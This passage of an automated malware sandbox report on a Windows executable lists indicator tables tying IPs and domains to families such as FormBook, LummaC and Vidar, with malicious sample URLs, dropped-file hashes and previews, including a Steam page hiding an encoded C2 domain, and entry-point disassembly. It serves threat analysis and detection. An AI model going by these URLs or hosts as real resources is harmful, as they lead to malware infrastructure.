                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                              Simulations

                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                              03:07:15API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                              IPs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.rgenerousrs.store/o362/
                                                                                                                                                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.beylikduzu616161.xyz/2nga/
                                                                                                                                                                                              Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                                                                                                              ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • paste.ee/d/lxvbq
                                                                                                                                                                                              Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                                                                                                              PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                              • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                                                                                                              QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                              • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                                                                                                              http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                                                                                              gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                                                                                                              Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                                                                                                              • gmtagency.online/api/check
                                                                                                                                                                                              104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                              • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                              http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • www.valvesoftware.com/legal.htm

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              llal.xyz0x001900000002ab40-59.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              steamcommunity.comExlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              GPU-Z.exeGet hashmaliciousLummaC, DarkTortilla, LummaC StealerBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                              iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              oe9KS7ZHUc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              MPgkx6bQIQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                              l0zocrLiVW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 23.55.153.106

                                                                                                                                                                                              ASNs

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              CLOUDFLARENETUSvj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.20.99.10
                                                                                                                                                                                              vj0Vxt8xM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.20.99.10
                                                                                                                                                                                              dropper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                              1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 172.67.144.62
                                                                                                                                                                                              https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.21.30.45
                                                                                                                                                                                              U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                              • 104.21.38.84
                                                                                                                                                                                              rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                                                                                                                                              • 162.159.128.233
                                                                                                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.21.48.1
                                                                                                                                                                                              https://thetollroads.com-wfmo.xyz/usGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                              AKAMAI-ASUSsetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 23.217.49.150
                                                                                                                                                                                              decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                              decrypt.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                              FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.102.34.241
                                                                                                                                                                                              decrypt.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                              EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                                                                                                                              • 184.28.90.27
                                                                                                                                                                                              Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 104.64.19.63

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e190000000000000000.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              0000000000000000.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              1.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              Let's_20Compress.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              CenteredDealing.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                              • 104.102.49.254

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_OXoeX1Ii3x.exe_ff6e839fbc87f846dac04b4093999c48a66e696_6a8cdeb1_807de54d-3fa2-4986-b8e3-16ef5db3b5a3\Report.wer

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                              Entropy (8bit):1.0176843562603886
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:cwFfCeQsahqQg7qNHSKQXIDcQsc6j0cEGcw3Zs+HbHg/8BRTf3uEpaYHh4pnD+kH:pAeQ6uq0CH0MnjGnvJzuiFXZ24IO8yH
                                                                                                                                                                                              MD5:581C4F9C5556B602D68FF66CB3CB4CB0
                                                                                                                                                                                              SHA1:C16826E1550C8FA6FDBD28313BCB63DE9F9D8146
                                                                                                                                                                                              SHA-256:467AC6DA132C56CBE681C8F6F2CBD1E2B783336F41DFE5216618C36C7399D3F9
                                                                                                                                                                                              SHA-512:41D60847EC078BAB0C86BFF51B96C8FD54B4499F091AD9060EA5ADF025AE806FCFB3C91E690B3FF9A08E60F95A3CC4288EAF594DCF5844F69EB39B0BC4E33DFC
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.1.9.2.4.1.9.0.4.6.1.8.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.1.9.2.4.1.9.5.1.4.9.3.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.0.7.d.e.5.4.d.-.3.f.a.2.-.4.9.8.6.-.b.8.e.3.-.1.6.e.f.5.d.b.3.b.5.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.e.1.2.c.3.7.-.1.e.6.0.-.4.b.0.d.-.8.e.e.c.-.e.8.d.7.c.6.5.8.2.3.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.O.X.o.e.X.1.I.i.3.x...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.0.-.0.0.0.1.-.0.0.1.4.-.3.0.e.4.-.c.2.1.f.2.4.5.c.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.c.2.2.9.7.b.9.5.8.7.7.0.8.4.1.d.b.f.2.e.5.a.9.0.4.5.1.5.b.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.3.7.0.2.4.4.6.6.9.d.a.e.a.5.f.8.7.c.7.9.7.d.6.a.d.2.4.0.a.d.b.f.b.7.0.0.6.3.8.4.!.O.X.o.e.X.1.I.i.3.x...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER49CE.tmp.dmp

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 1 08:06:59 2025, 0x1205a4 type
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):131032
                                                                                                                                                                                              Entropy (8bit):1.9068492641388415
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:787mRbrzeeibJJNSjdRWklBaDbkl1hsQjwFe3pBV+6jIdJGIq3YGFs:4yRJibJJNedckSDb4hxWE7VpzI+Yks
                                                                                                                                                                                              MD5:08966431692F25B253465EE1757DE3AB
                                                                                                                                                                                              SHA1:B8A12DBECD7693DDCC883E8F60B5B172F0B6BEF7
                                                                                                                                                                                              SHA-256:1D69A40E8E6F721AC714F128CEFDCD0282BD05F1846F2548930489965068FACD
                                                                                                                                                                                              SHA-512:75BD462A97C2B07C75A819EDFA10BEA846D5F001364A323E53784B4801381B0E0E75A44079530E860DDA18F7EEC068126F9E98FC110807F41A4499EEB48593EB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:MDMP..a..... .........tg............D...........T...L...........dP..........T.......8...........T............M.. ............"...........$..............................................................................eJ......$%......GenuineIntel............T.......P.....tg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AD9.tmp.WERInternalMetadata.xml

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):8378
                                                                                                                                                                                              Entropy (8bit):3.693935710223083
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:R6l7wVeJwn/6j6Y9GSUIJLgmfw2pbpDM89bFZsfm3m:R6lXJw6j6Y8SUIJLgmfwQFyfn
                                                                                                                                                                                              MD5:A7838F711EE0041660BC61C07B2FDD03
                                                                                                                                                                                              SHA1:71D79EC3091F58D475CC28E06AEAABFD3579640D
                                                                                                                                                                                              SHA-256:4954B066F7C7FDC330BF3E65345B808FCB8E49C510A47104B349767B491CD570
                                                                                                                                                                                              SHA-512:038836E34942B65612D2216E3A9E92164A2ACB67D8F660221E2A6ED6F6C5E78A53EDF63733BCA53C3BFCAAC60D5E8A4FCEBE9E2457F4361361B29B88B6034B31
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.0.4.<./.P.i.

                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B09.tmp.xml

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):4680
                                                                                                                                                                                              Entropy (8bit):4.457179477019089
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:cvIwWl8zs9Jg77aI9ajxWpW8VYmYm8M4JArLirnFlM+q8vWrLirExm1o3pd:uIjfXI78jg7VCJArmrEKWrmrExV3pd
                                                                                                                                                                                              MD5:EB6662A3EF7ACBD975D01AE15AF75ABF
                                                                                                                                                                                              SHA1:6B59DAF035CEF3E1288CCB5B92DCB61309AF22E8
                                                                                                                                                                                              SHA-256:B9241CFA15F20B88B84E6553786AAAE18C966F911CC118EB7DF4081968E720AC
                                                                                                                                                                                              SHA-512:356690F6E8F8DB3D7E318AB3A249700D4A856CC7715F2156D60A5E8B563E4D5FD7C0A0714143FC3A75C37BC41AA02A83E5B47536B9D4F242F115380CC99A560B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="656589" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199619938930[1].htm

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\OXoeX1Ii3x.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3188)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):35137
                                                                                                                                                                                              Entropy (8bit):5.372929654931821
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:7fBpqhYGM4evx83TfwtuXNS3F4aXfsW9l+X9hJYFnzOMD5QBdxaXfsW9l+X9hJYk:DB8hYGM4evx83TfwtuX84aXfsW9l+X9X
                                                                                                                                                                                              MD5:7CC5524C7757D70583944AFDB16F641D
                                                                                                                                                                                              SHA1:3AB509C13EB9B3A018A2F7F6BDADA256808E9894
                                                                                                                                                                                              SHA-256:DF0099583496ACE05DF71A8A5F4D84B99078B4C7CF8342A9C536C179558BA136
                                                                                                                                                                                              SHA-512:93BB0596F0D4C508109831411BFD25C8BB87814B1C4B3DCB88832591329C89012170199C8397D4EDB71781DB938BD07D74411EA937A46BCF0BE94EC7BC14F807
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: 3e3 bGxhbC54eXo=4e4</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=english&amp;_cdn=fastly" rel="stylesheet" type="text/css">.<link href="https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cdn=fastly" re

                                                                                                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                              Entropy (8bit):4.465437324370383
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:lIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNndwBCswSbp:GXD94+WlLZMM6YFHB+p
                                                                                                                                                                                              MD5:037415883CB394E77A69360AF35B7851
                                                                                                                                                                                              SHA1:CBA1BDAD3A2A932BB1E92D1C50CD519B155FA3B0
                                                                                                                                                                                              SHA-256:448E5F193EBDCDA103BC3C7D650AD1C053D75C579548BB039996DF5FAF274DD9
                                                                                                                                                                                              SHA-512:366F848D6220AB8F4853DD04FD90397804B0736E9EF281CA28BAAA673F7853BDC68755F9E148E5A831A5EC0C409CFC5FF55F867735B8E77672D7A1A42EA22FC7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.f.!$\..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Entropy (8bit):6.544491165544845
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:OXoeX1Ii3x.exe
                                                                                                                                                                                              File size:378'368 bytes
                                                                                                                                                                                              MD5:3e9881b9c6ff4994fc9d684456694e77
                                                                                                                                                                                              SHA1:370244669daea5f87c797d6ad240adbfb7006384
                                                                                                                                                                                              SHA256:a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
                                                                                                                                                                                              SHA512:7b9c266baac07d919376931191ec5ba861ea747cce2a080ddfff3d76067c5125b75618d579db55a3458309743cbe12a75aa76feb1a1a9f5397eed9aa87b0a996
                                                                                                                                                                                              SSDEEP:6144:HSD7bIFLWv34AH9i1Bb5bB3JymF5siEy+GFafYJdWFN+VK:2YQLo1BtWmhEIJovsK
                                                                                                                                                                                              TLSH:29849C32B945E432D16202311F5DDBB5AA7DB1700FB218CBB3E45E6DAEB46C09231F66
                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t.......t......1t.......t..O....t..O....t..O....t.......t...t...t..~....t..~....t..Rich.t..........PE..L...w.Xf...

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:90cececece8e8eb0

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x41d1a0
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x6658D677 [Thu May 30 19:41:43 2024 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                              Import Hash:64cf79ceef6f212e81ad5276c01ae859

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              call 00007FE5748B6A75h
                                                                                                                                                                                              jmp 00007FE5748B642Dh
                                                                                                                                                                                              and dword ptr [ecx+04h], 00000000h
                                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                                              and dword ptr [ecx+08h], 00000000h
                                                                                                                                                                                              mov dword ptr [ecx+04h], 00446B48h
                                                                                                                                                                                              mov dword ptr [ecx], 00446B40h
                                                                                                                                                                                              ret
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                              sub esp, 0Ch
                                                                                                                                                                                              lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                              call 00007FE5748B659Fh
                                                                                                                                                                                              push 004572E4h
                                                                                                                                                                                              lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                              push eax
                                                                                                                                                                                              call 00007FE5748B96E5h
                                                                                                                                                                                              int3
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                              and dword ptr [0045A5D8h], 00000000h
                                                                                                                                                                                              sub esp, 24h
                                                                                                                                                                                              or dword ptr [00459084h], 01h
                                                                                                                                                                                              push 0000000Ah
                                                                                                                                                                                              call dword ptr [004460A0h]
                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                              je 00007FE5748B6772h
                                                                                                                                                                                              and dword ptr [ebp-10h], 00000000h
                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              push esi
                                                                                                                                                                                              push edi
                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                              lea edi, dword ptr [ebp-24h]
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              cpuid
                                                                                                                                                                                              mov esi, ebx
                                                                                                                                                                                              pop ebx
                                                                                                                                                                                              nop
                                                                                                                                                                                              mov dword ptr [edi], eax
                                                                                                                                                                                              mov dword ptr [edi+04h], esi
                                                                                                                                                                                              mov dword ptr [edi+08h], ecx
                                                                                                                                                                                              xor ecx, ecx
                                                                                                                                                                                              mov dword ptr [edi+0Ch], edx
                                                                                                                                                                                              mov eax, dword ptr [ebp-24h]
                                                                                                                                                                                              mov edi, dword ptr [ebp-20h]
                                                                                                                                                                                              mov dword ptr [ebp-0Ch], eax
                                                                                                                                                                                              xor edi, 756E6547h
                                                                                                                                                                                              mov eax, dword ptr [ebp-18h]
                                                                                                                                                                                              xor eax, 49656E69h
                                                                                                                                                                                              mov dword ptr [ebp-04h], eax
                                                                                                                                                                                              mov eax, dword ptr [ebp-1Ch]
                                                                                                                                                                                              xor eax, 6C65746Eh
                                                                                                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                              inc eax
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              cpuid
                                                                                                                                                                                              mov esi, ebx
                                                                                                                                                                                              pop ebx
